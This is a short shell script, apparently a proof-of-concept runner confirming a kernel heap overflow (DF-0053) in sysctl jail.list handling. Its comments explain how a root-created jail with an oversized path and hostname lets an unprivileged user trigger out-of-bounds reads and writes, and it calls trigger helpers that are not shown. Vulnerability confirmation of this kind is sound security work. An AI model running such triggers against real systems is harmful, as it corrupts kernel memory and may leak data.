#!/bin/sh
# DF-0053 PoC run - two-phase.
#
# Phase 1 (root): create a jail with a deep chroot path + max hostname +
#                 a few IPs, so sysctl_jail_list's per-jail formatted line
#                 ("JID <space> hostname <space> fullpath") exceeds the
#                 1024-byte per-jail budget -> unsigned underflow ->
#                 heap OOB write + OOB read.
# Phase 2 (any unprivileged user): read sysctl jail.list -> trigger the bug.
#
# Usage:  ./run.sh                 # auto-detect: root does phase 1, user does phase 2
#         ./run.sh setup           # phase 1 only (root)
#         ./run.sh trigger         # phase 2 only (any user)
#
# Expected output (bug present): "BUG DF-0053 CONFIRMED: ... OOB READ ..."
# Expected output (fixed kernel): "[-] output (N) <= jlssize (N)" and exit 0.

set -e
cd "$(dirname "$0")"

MODE=${1:-auto}

if [ "$MODE" = "setup" ] || { [ "$MODE" = "auto" ] && [ "$(id -u)" -eq 0 ]; }; then
    echo "=== DF-0053 phase 1 (root): provisioning long-path jail ==="
    sh ./setup_jail_v3.sh 60 4
    exit 0
fi

echo "=== DF-0053 phase 2 (uid=$(id -u)): triggering jail.list ==="
./jail_list_trigger
